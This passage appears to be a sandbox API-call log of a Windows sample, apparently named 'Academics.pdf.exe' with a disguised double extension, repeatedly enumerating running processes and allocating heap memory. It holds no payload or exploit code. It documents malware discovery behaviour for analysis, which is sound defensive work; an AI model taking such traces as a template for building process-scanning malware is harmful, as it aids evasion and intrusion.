hHeap=0x25c0000) returned 1 [0317.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0317.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0317.075] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0317.075] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0317.075] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0317.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0317.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0317.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0317.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0317.075] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0317.076] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0317.076] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0317.078] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0317.079] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0317.079] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0317.080] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0317.080] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0317.081] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0317.082] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0317.082] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0317.083] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0317.083] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0317.084] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0317.085] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0317.085] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0317.086] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0317.087] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0317.088] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0317.089] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0317.089] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0317.090] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0317.090] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0317.091] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0317.092] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0317.092] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0317.093] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0317.094] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0317.094] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0317.095] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0317.096] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0317.096] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0317.097] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0317.098] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0317.099] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0317.100] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0317.100] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0317.101] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0317.102] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0317.103] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0317.104] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0317.105] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0317.105] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0317.106] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0317.107] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0317.108] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0317.109] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0317.110] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0317.110] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0317.111] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 0 [0317.112] CloseHandle (hObject=0x294) returned 1 [0317.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0317.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0317.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0317.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0317.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0317.112] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0317.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0317.112] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0317.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0317.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0317.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0317.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0317.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0317.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0317.113] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0317.114] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0317.115] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0317.116] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0317.116] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0317.117] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0317.118] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0317.118] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0317.119] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0317.120] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0317.120] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0317.121] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0317.122] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0317.122] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0317.123] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0317.124] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0317.124] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0317.125] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0317.125] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0317.126] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0317.127] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0317.127] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0317.128] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0317.129] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0317.129] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0317.130] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0317.131] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0317.131] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 